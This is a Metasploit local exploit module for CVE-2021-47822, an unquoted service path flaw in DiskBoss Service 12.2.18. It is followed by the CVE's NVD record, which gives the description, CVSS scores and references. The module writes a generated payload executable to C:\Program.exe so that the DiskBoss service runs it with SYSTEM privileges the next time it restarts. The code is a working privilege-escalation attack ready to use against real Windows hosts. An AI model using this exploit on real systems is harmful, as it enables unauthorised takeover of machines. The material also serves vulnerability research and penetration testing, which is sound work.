CVE-2021-47822

# Metasploit Module for CVE-2021-47822 - DiskBoss Service Unquoted Service Path # This module exploits the unquoted service path vulnerability in DiskBoss Service # Target: DiskBoss Service 12.2.18 # Author: VulnCheck # Disclosure: [email protected] require 'msf/core/exploit/exe' class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking def initialize(info = {}) super(update_info(info, 'Name' => 'DiskBoss Service Unquoted Service Path Privilege Escalation', 'Description' => %q{ This module exploits an unquoted service path vulnerability in DiskBoss Service. The vulnerability exists because the service binary path is not properly quoted, allowing attackers to place malicious executables in intermediate path directories. When the service starts, Windows will attempt to execute the malicious binary with SYSTEM privileges. }, 'License' => MSF_LICENSE, 'Author' => ['VulnCheck'], 'DisclosureDate' => '2022-01-16', 'Platform' => ['win'], 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, 'References' => [ ['CVE', '2021-47822'], ['URL', 'https://www.vulncheck.com/advisories/diskboss-service-diskbsaexe-unquoted-service-path'], ['EDB', '49899'] ] )) end def exploit # Generate payload executable payload_exe = generate_payload_exe # Target path where malicious executable will be placed # The service path is typically: C:\Program Files\DiskBoss\bin\diskbsa.exe # We target the intermediate directory 'Program' to gain execution target_path = "C:\\Program.exe" print_status("Placing malicious executable at #{target_path}") # Write the payload to the target path write_file(target_path, payload_exe) print_good("Malicious executable placed successfully!") print_status("Waiting for service restart to trigger payload execution...") print_status("The DiskBoss service will execute C:\\Program.exe with SYSTEM privileges") end end

{"cve": {"id": "CVE-2021-47822", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:06.857", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "DiskBoss Service 12.2.18 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path by placing malicious executables in potential path locations to gain system-level access during service startup."}, {"lang": "es", "value": "DiskBoss Service 12.2.18 contiene una vulnerabilidad de ruta de servicio sin comillas en su configuración de ruta binaria que permite a atacantes locales ejecutar código con privilegios elevados. Los atacantes pueden explotar la ruta sin comillas colocando ejecutables maliciosos en ubicaciones de ruta potenciales para obtener acceso a nivel de sistema durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.diskboss.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49899", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/diskboss-service-diskbsaexe-unquoted-service-path", "source": "[email protected]"}]}}